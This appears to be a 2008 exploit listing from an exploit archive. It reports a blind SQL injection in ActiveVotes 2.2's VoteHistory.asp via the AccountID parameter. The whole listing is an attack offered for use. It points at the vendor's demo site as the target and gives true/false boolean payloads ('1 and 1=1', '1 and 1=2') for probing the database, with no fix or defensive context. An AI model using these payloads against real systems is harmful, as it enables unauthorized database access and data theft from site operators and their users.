id: 4309
date: 11/29/2008
title: ActiveVotes 2.2 (AccountID) Blind SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

=============================================================
ActiveVotes 2.2 (AccountID) Blind SQL Injection Vulnerability
=============================================================


 [~]Tybe:(VoteHistory.asp AccountID) Blind SQL Injection Vulnerability
   
 [~]Vendor:www.activewebsoftwares.com
   
 [~]Software: ActiveVotes v 2.2
   
 [~] Date: 28.11.2008
   
 [~] Home: www.ahacker.biz
   
 [~] contact: N/A

[~] -----------------------------------------------------------
   
 [~]3xpL0!7 4 d3m0:
   
  www.activewebsoftwares.com/demoactivevotes/VoteHistory.asp?AccountID={bL!ND}
   
 [~] 8L!/\/D:
   
  7Ru3 : VoteHistory.asp?AccountID= 1 and 1=1

  f4L53: VoteHistory.asp?AccountID= 1 and 1=2
   
   
 
[~]--------------------------------------------------------------------------------



#  0day.today [2023-03-23]  #